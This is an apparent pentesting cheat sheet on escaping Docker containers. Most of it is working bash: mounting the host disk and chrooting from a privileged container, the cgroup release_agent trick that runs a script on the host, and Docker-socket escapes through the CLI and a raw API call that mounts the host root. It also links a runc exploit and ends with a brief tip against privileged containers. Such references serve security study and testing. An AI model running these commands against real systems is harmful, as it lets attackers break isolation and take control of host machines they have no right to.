Container Escapes
Exploitation
Container escape techniques allow attackers to break out of container isolation and gain access to the underlying host system. Common vectors include privileged containers, exposed Docker socket, and kernel exploits.
Privileged Container Escape
bash
# Check if container is privileged
cat /proc/1/status | grep CapEff
# If running with --privileged, can mount host filesystem
mkdir /host
mount /dev/sda1 /host
# Chroot into host
chroot /host /bin/bash
# Alternative: cgroup escape (if privileged)
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
echo 1 > /tmp/cgrp/notify_on_release
# Write host filesystem access script
cat > /cmd <<EOF
#!/bin/sh
ps aux > /output
EOF
chmod +x /cmd
# Trigger execution on host
echo "$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)/cmd" > /tmp/cgrp/release_agent
sh -c "echo $$ > /tmp/cgrp/cgroup.procs"
# Docker socket escape
# If /var/run/docker.sock is mounted in container
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host
# Or use docker API directly
curl --unix-socket /var/run/docker.sock -X POST -H "Content-Type: application/json" -d '{"Image":"alpine","Cmd":["/bin/sh"],"HostConfig":{"Binds":["/:/host"]}}' http://localhost/containers/create
# Kernel exploits (CVE-2019-5736 runc escape)
# Overwrite runc binary on host during container start
# https://github.com/Frichetten/CVE-2019-5736-PoCNever Run Containers as --privileged
The
--privileged flag removes all security constraints. It should almost never be used in production.
If elevated permissions are needed, grant specific capabilities (CAP_NET_ADMIN, CAP_SYS_ADMIN) instead.